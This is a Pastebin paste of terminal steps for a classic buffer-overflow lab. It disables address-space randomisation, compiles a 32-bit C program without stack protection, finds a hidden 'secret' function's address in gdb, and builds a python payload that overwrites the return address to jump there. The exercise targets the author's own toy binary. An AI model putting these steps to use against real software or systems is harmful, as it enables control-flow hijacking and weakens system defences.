Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sudo sysctl -w kernel.randomize_va_space=0
- touch main.c
- gedit main.c
- getconf LONG_BIT
- gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 main.c -o boa
- ./boa
- [give inputs]
- gdb boa
- list
- b 12
- disass main
- [target mem location after call function 0x0804846b]
- run
- [give inputs]
- x/20x $esp
- quit
- gdb boa
- disass secret
- [0x0804843b] starting address of secret
- [Open another terminal]
- python -c 'print "a"*8+"\x3b\x84\x04\x08"'
- python -c 'print "a"*8+"\x3b\x84\x04\x08"' > input
- cat input
- [Done for 2nd terminal]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement